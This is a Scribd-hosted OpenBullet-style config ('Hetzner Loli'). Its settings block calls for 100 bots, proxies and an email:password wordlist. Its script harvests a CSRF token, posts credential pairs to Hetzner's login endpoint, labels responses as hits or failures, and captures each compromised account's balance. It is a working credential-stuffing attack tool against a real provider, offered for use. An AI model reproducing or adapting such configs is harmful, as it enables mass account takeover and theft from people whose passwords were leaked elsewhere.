100% found this document useful (1 vote)
248 views2 pages

Hetzner Loli

The document contains settings for a bot including the author, version number, and configuration options. It also includes a script that makes requests to login to a Hetzner account, check for login success or failure, and parse the account balance from the response. The script collects the CSRF token, sends login credentials, and extracts the user's account balance after authenticating.

Uploaded by

mohamed bignane
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
100% found this document useful (1 vote)
248 views2 pages

Hetzner Loli

The document contains settings for a bot including the author, version number, and configuration options. It also includes a script that makes requests to login to a Hetzner account, check for login success or failure, and parse the account balance from the response. The script collects the CSRF token, sends login credentials, and extracts the user's account balance after authenticating.

Uploaded by

mohamed bignane
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

[SETTINGS]

{
"Name": "hetzner",
"SuggestedBots": 100,
"MaxCPM": 0,
"LastModified": "2020-09-17T18:05:28.0272825+01:00",
"AdditionalInfo": "",
"RequiredPlugins": [],
"Author": "Amine",
"Version": "1.2.2",
"SaveEmptyCaptures": false,
"ContinueOnCustom": false,
"SaveHitsToTextFile": false,
"IgnoreResponseErrors": false,
"MaxRedirects": 8,
"NeedsProxies": true,
"OnlySocks": false,
"OnlySsl": false,
"MaxProxyUses": 0,
"BanProxyAfterGoodStatus": false,
"BanLoopEvasionOverride": -1,
"EncodeData": false,
"AllowedWordlist1": "MailPass",
"AllowedWordlist2": "",
"DataRules": [],
"CustomInputs": [],
"ForceHeadless": false,
"AlwaysOpen": false,
"AlwaysQuit": false,
"QuitOnBanRetry": false,
"DisableNotifications": false,
"CustomUserAgent": "",
"RandomUA": false,
"CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://accounts.hetzner.com/login_check"
CONTENT ""
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#csrf_token PARSE "<SOURCE>" LR "name=\"_csrf_token\" value=\"" "\">" -> VAR


"csrf_token"

REQUEST POST "https://accounts.hetzner.com/login_check"


CONTENT "_username=<USER>&_password=<PASS>&_csrf_token=<csrf_token>"
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
HEADER "Origin: https://accounts.hetzner.com"
HEADER "Referer: https://accounts.hetzner.com/login"

KEYCHECK
KEYCHAIN Failure OR
KEY "Invalid credentials."
KEYCHAIN Success OR
KEY "user account"
KEY "logout"

REQUEST POST "https://accounts.hetzner.com/invoice/credit"


CONTENT ""
CONTENTTYPE "application/x-www-form-urlencoded"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"

#balance PARSE "<SOURCE>" LR "<span class=\"deposit-value\">" "</span"


CreateEmpty=FALSE -> CAP "balance"

You might also like